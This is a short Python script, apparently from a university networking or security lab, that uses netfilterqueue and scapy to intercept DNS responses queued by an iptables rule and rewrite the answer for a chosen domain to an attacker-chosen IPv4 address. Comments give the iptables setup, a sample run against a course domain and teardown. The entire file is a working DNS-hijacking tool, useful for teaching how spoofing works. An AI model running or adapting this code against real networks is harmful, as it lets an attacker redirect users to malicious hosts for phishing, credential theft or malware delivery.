#!/usr/bin/python3

from netfilterqueue import NetfilterQueue
from scapy.all import *
import sys


# iptables -I INPUT -p udp --sport 53 -j NFQUEUE --queue-num 1
# ./mitm-dns_hijack.py ocw.cs.pub.ro. 10.11.12.13
# dig +short ocw.cs.pub.ro
# iptables -D INPUT 1


# user defined values (initialized in main())
# dn_bytes  = b'ocw.cs.pub.ro.'	 NOTE the '.' at the end
# ip_string = '10.11.12.13' 
dn_bytes  = None
ip_string = None


# callback - called when a new packet is to be evaluated
#	@pkt - netfilterqueue Packet (accept / drop / ...)
def callback(pkt):
	# initialize a scapy ip packet with received data
	payload = pkt.get_payload()
	ip      = IP(payload)

	# determine if one of the response fields (if any) is for our dn
	ocw_rr_idx = None
	for it in range(ip['DNS'].ancount):
		if ip['DNS'].an[it].rrname == dn_bytes:
			ocw_rr_idx = it
			break

	# no response for our dn => let it pass
	if ocw_rr_idx is None:
		pkt.accept()
		return

	# overwrite the rdata with our ipv4
	ip['DNS'].an[ocw_rr_idx].type  = 1			# A
	ip['DNS'].an[ocw_rr_idx].rdata = ip_string

	# let scapy recaulculate these fields for modified packet to be accepted
	del ip['IP'].len
	del ip['IP'].chksum
	del ip['UDP'].len
	del ip['UDP'].chksum

	# overwrite netfilter packet with modified scapy packet and accept
	pkt.set_payload(ip.__bytes__())
	pkt.accept()


# main - program entry point
def main():
	global dn_bytes
	global ip_string

	# scapy takes dn as bytes and ip as string
	dn_bytes  = bytes([ord(it) for it in sys.argv[1]])
	ip_string = sys.argv[2]

	# set up netfilter queue
	nfq = NetfilterQueue()
	nfq.bind(1, callback)

	try:
		nfq.run()
	except KeyboardInterrupt:
		pass
	finally:
		nfq.unbind()


# usage - shows how to run this script
def usage():
	print('Usage:')
	print('    # ./mitm-dns_hijack.py ocw.cs.pub.ro. 10.11.12.13')
	print()


if __name__ == '__main__':
	if len(sys.argv) != 3:
		usage()
		exit(1)

	main()